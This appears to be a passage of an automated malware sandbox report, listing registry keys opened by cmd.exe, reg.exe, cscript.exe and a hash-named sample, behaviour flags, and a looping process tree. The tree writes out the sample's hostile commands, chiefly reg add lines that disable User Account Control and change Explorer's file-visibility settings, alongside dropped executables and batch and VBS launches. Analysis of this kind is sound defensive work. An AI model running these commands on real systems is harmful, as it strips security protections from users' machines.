| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\joQgYIAY\FMcQwsEQ.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
"C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe"
C:\Users\Admin\joQgYIAY\FMcQwsEQ.exe
"C:\Users\Admin\joQgYIAY\FMcQwsEQ.exe"
C:\ProgramData\vMQAkIIk\LyYAcIUU.exe
"C:\ProgramData\vMQAkIIk\LyYAcIUU.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TusoEowk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RsooYMsc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TOMsckIM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZkcoAQAE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SskAEkUY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uMQAEYwU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AAMoUAgY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\toMgYQsk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NUAAMQkk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FAkQkAcI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vMQIMQko.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gEcksIQk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qGIIsckE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ioAkkUkU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GWAAMccA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
